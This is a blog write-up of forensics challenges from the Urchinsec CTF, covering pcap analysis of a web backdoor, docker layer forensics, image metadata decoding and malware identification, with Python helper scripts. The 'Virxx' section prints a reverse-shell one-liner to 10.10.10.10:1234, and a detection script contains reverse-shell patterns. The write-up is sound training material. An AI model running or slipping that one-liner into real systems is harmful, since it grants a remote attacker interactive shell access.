
URCHINSEC CTF MMXXII Forensics WriteUp

Hey guys and welcome to my blog. Today I will be tackling all the challenges I knocked out in Urchinsec's CTF. This was a jeopardy-style CTF hosted by our competitors, Urchinsec. I mainly focused on the forensics category but attempted some web and OSINT challenges. Special thanks to the forensics author, @tahaafarooq, and the whole gang for organising the CTF. With that said, let's dive in.

Streams

We were able to capture some packets that we believe to have some information about what the hacker had done after installing a backdoor on our server system, can you figure out what was taken?

In this challenge, you are given a packet capture file and need to figure out what the attacker might have taken. The first thing I do when opening a pcap file is look at the protocol hierarchy statistics to see which protocols have been used most frequently (Statistics > Protocol Hierarchy). In this case, HTTP is a good place to start since its traffic is mostly unencrypted. We see that we have some Line-based text data. We can right-click on it and apply it as a filter.


We now have 8 packets which seem to give a clue to what really happened. The attacker abused the cmd parameter to execute system commands.


He ran the id and whoami commands to find out who the current user was,


the ls command to list files in the current directory,


and then he read the contents of the flag.
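The same timeline can be rebuilt outside Wireshark. The following is an added example (not part of the original writeup): it takes HTTP request lines as Wireshark shows them in the Info column, pulls out every value of the cmd parameter, and reports which files were read. The request lines are constructed for the example; the backdoor path and file names are assumptions.

```python
import re
import shlex
from urllib.parse import parse_qs, urlsplit

# Constructed sample: HTTP request lines as Wireshark shows them in the Info
# column when a web backdoor is driven through a "cmd" query parameter.
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1",
    "GET /backdoor.php?cmd=id HTTP/1.1",
    "GET /backdoor.php?cmd=whoami HTTP/1.1",
    "GET /backdoor.php?cmd=ls%20-la HTTP/1.1",
    "GET /backdoor.php?cmd=cat+flag.txt HTTP/1.1",
    "POST /login HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")


def extract_commands(request_lines, param="cmd"):
    """Return (packet_no, decoded_command) for every request carrying the parameter."""
    found = []
    for no, line in enumerate(request_lines, start=1):
        m = REQUEST_LINE.match(line.strip())
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs also URL-decodes "%20" and "+" for us
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            found.append((no, value))
    return found


def files_read(commands, readers=("cat", "less", "more", "head", "tail")):
    """Files the attacker read via common file-reading commands (what was 'taken')."""
    files = []
    for _, cmd in commands:
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue  # unbalanced quotes: skip rather than crash on hostile input
        if argv and argv[0] in readers:
            files.extend(a for a in argv[1:] if not a.startswith("-"))
    return files


if __name__ == "__main__":
    cmds = extract_commands(SAMPLE_REQUESTS)
    for no, cmd in cmds:
        print(f"packet {no}: {cmd}")
    print("files read:", files_read(cmds))
```

To use it on a real capture, export the request lines from Wireshark (File > Export Packet Dissections, or tshark with the http.request.uri field) and feed them to extract_commands.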


urchin{wireshark_1s_pr3tty_g00d_f0r_analys!NG}

Duck Duck Dock

Ashes everywhere , my past has turned into ashes , i’m about to lose it!

In this challenge, you are given a compressed docker image for analysis. I used a tool called dive to analyse the docker image layers before extracting it.

dive is a tool for exploring a docker image, layer contents, and discovering ways to shrink the size of your Docker/OCI image.

You can install the tool with this simple one-liner:

wget https://github.com/wagoodman/dive/releases/download/v0.10.0/dive_0.10.0_linux_amd64.deb && sudo apt install ./dive_0.10.0_linux_amd64.deb

Run the following command to start diving😅

dive docker-archive://duckdock.tar


From the screenshot above, we can see the compressed docker image has 4 layers. There is a left pane and a right pane. To navigate to the next layer, hit the down arrow key. To switch to the right pane, hit the Tab key. In docker forensics we are interested in the modified or deleted files. In this case, when you switch to the right pane and hit Ctrl+U, you can see the files modified in that layer (refer to the screenshot below).


In this case we see jacob's home directory containing a bash_history file.


The third layer had a bash script in the /opt directory.


The last layer had a flag in admin's home directory.


I will give you a shortcut, although it's always good to do some manual analysis😉

You can add the -j parameter to the previous command to write the layer analysis statistics to a given JSON file.


That's pretty much what we found when diving manually. Take note of the highlighted layer IDs, as those are the ones we can dig into to understand more about the image.

Since this is a tar file, you can extract it using the following command:

tar xvf duckdock.tar


Exploring the layer containing the bash history, we can see a user being created and deleted, modification of the bash script, as well as a hint.🤔 Looking at the flag file in admin's home dir, we get more pewpew's 😅
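Walking the layers by hand after tar xvf works, but the same thing can be scripted. This is an added example (not from the writeup or from dive): it reads a docker-archive tar, follows manifest.json to each layer tarball in apply order, and lists what each layer adds and what it deletes via the ".wh." whiteout markers overlay filesystems use. The archive it analyses is constructed in memory to mirror the challenge (a home directory, a script in /opt, a flag); file names and contents are assumptions.

```python
import io
import json
import tarfile


def _tar_bytes(entries):
    """Build an in-memory tar from a {path: bytes} mapping (regular files only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, data in entries.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_archive():
    """Constructed docker-archive: three layers, the second deletes a user's home with a whiteout."""
    layers = [
        _tar_bytes({"home/jacob/.bash_history": b"useradd ghost\nuserdel ghost\n"}),
        _tar_bytes({"opt/run.sh": b"#!/bin/bash\necho hi\n", "home/.wh.ghost": b""}),
        _tar_bytes({"home/admin/flag": b"urchin{constructed_sample}\n"}),
    ]
    entries = {f"layer{i}/layer.tar": blob for i, blob in enumerate(layers)}
    manifest = [{"Config": "cfg.json", "RepoTags": ["duckdock:latest"],
                 "Layers": list(entries)}]
    entries["manifest.json"] = json.dumps(manifest).encode()
    return _tar_bytes(entries)


def walk_layers(archive_bytes):
    """Return [(layer_path, added_files, deleted_paths)] in the order the layers were applied."""
    result = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes)) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        for layer_path in manifest[0]["Layers"]:
            blob = outer.extractfile(layer_path).read()
            added, deleted = [], []
            with tarfile.open(fileobj=io.BytesIO(blob)) as inner:
                for member in inner.getmembers():
                    base = member.name.rsplit("/", 1)[-1]
                    if base.startswith(".wh."):
                        # whiteout marker: this path was removed from the lower layer
                        deleted.append(member.name.replace(".wh.", "", 1))
                    elif member.isfile():
                        added.append(member.name)
            result.append((layer_path, added, deleted))
    return result


if __name__ == "__main__":
    for path, added, deleted in walk_layers(build_sample_archive()):
        print(path, "added:", added, "deleted:", deleted)
```

On a real image, replace build_sample_archive() with the bytes of duckdock.tar; deleted entries are exactly the files a dive user would otherwise have to spot by eye.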



Anyway, looking at the layer containing the bash script, we get the flag as a weird string.


Using CyberChef to decode it, we get the flag.


urchin{d>cker_f>rensics_is_fun}

Meta

Metaverse, Metadata, Metaphor, blah blah

In this challenge you are given an image. The first thing that comes to mind is doing some steg analysis. Using exiftool, you can look at the file metadata for potentially useful info. Looking at the Artist parameter, I noted an odd string.


Using CyberChef, you can easily identify the string type with the Magic module. From there we learn that it's hex encoded. Decoding it gives you the flag.


urchin{metadatas_4re_v3ry_int3r3sting_stuff}

Virxx

This is madness, a 0/56. How, how, how? Can you figure out how this happened?

In this challenge, you are given a file containing some ASCII text. Running cat on the file, you get a bash one-liner. I even tried running strings on it but got stuck.😪

➜  file file
file: ASCII text
➜  wc file
 1  6 50 file
➜  cat file
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"
➜  strings file
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"

It took me a while to figure out how to proceed from here. I got a nudge from my teammate Winter to think about the name of the challenge. VirusTotal!!! I uploaded the file to VirusTotal and got the flag.😅
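The 0/56 in the challenge description is the point: a plain-text one-liner like this has no signature for most engines, so a defender has to recognise the pattern instead. The following is an added example (not part of the writeup) that triages shell snippets for bash's /dev/tcp and /dev/udp pseudo-devices, pulls out the remote host and port as indicators, and separates an interactive shell bound to the socket from a harmless one-off redirect. The sample lines are constructed; the example.com line is a benign lookalike.

```python
import re

# Constructed sample lines: the challenge's one-liner plus benign lookalikes.
SAMPLE_LINES = [
    'bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"',
    "echo hello > /tmp/out.txt",
    "exec 3<>/dev/tcp/example.com/80 && echo -e 'GET / HTTP/1.0\\n' >&3",
]

# bash opens a socket when a redirection targets /dev/tcp/<host>/<port> (or udp)
DEV_SOCKET = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})")
INTERACTIVE_SHELL = re.compile(r"\b(ba)?sh\s+-i\b")


def classify(line):
    """Describe a /dev/tcp|udp usage in the line (host, port, shell signs), or None if absent."""
    m = DEV_SOCKET.search(line)
    if not m:
        return None
    info = m.groupdict()
    info["port"] = int(info["port"])
    # An interactive shell whose stdio is redirected onto the socket is the
    # reverse-shell signature; a plain "exec 3<>/dev/tcp/..." fetch has neither.
    info["interactive_shell"] = INTERACTIVE_SHELL.search(line) is not None
    info["stdio_redirected"] = any(tok in line for tok in ("&>", "0<&", "<&1", "0>&1"))
    return info


def triage(lines):
    """Return (line_no, info) for every line that touches a /dev/tcp or /dev/udp path."""
    hits = []
    for no, line in enumerate(lines, start=1):
        info = classify(line)
        if info:
            hits.append((no, info))
    return hits


if __name__ == "__main__":
    for no, info in triage(SAMPLE_LINES):
        verdict = "reverse shell" if info["interactive_shell"] else "socket use"
        print(f"line {no}: {verdict} -> {info['proto']} {info['host']}:{info['port']}")
```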


urchin{basic_skill_in_mal_analysis}

That's it. Hopefully you learnt a thing or two. Generally the CTF was fun and I'm looking forward to their next CTF coming up in September. If you have any questions, feel free to ping me on Twitter @oste_ke. Till next time, take care and keep safe. 😎

This post is licensed under CC BY 4.0 by the author.